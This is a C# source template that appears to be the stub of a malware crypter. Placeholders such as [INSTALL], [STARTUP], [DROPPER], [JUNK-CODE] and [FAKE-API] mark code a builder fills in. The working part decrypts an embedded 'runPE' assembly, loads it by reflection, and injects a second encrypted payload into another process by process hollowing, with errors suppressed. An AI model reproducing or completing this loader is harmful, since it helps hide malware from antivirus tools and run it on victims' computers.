using System;
using System.Resources;
using System.Reflection;
using System.Security.Cryptography;
using System.Text;
using System.IO;
using System.Runtime.InteropServices;

[ASSEMBLY-CHANGER]

namespace Lawl
{
    class Program
    {
        static void Main()
        {
            try
            {
				[INSTALL]
				[STARTUP]
                ResourceManager MANAGER = new ResourceManager("shank", Assembly.GetExecutingAssembly());
                [DROPPER]
                byte[] b = (byte[])MANAGER.GetObject("runPE");
                b = Decrypt(b, "{RUNPEKEY}");
                Assembly asm = Assembly.Load(b);
                Type t = asm.GetTypes()[[TYPE-NUMBER]];
                MethodInfo mi = t.GetMethod("[METHOD-NAME]");
                string into = [INJECT-INTO];
                mi.Invoke(Activator.CreateInstance(t), new object[]{Decrypt((byte[])MANAGER.GetObject("cheese"), "{KEY}"), into});
            }
            catch { }
        }
        
        [DEFAULT-BROWSER]

        [ENCRYPTION]
        
        [JUNK-CODE]
        
        [FAKE-API]
    }
}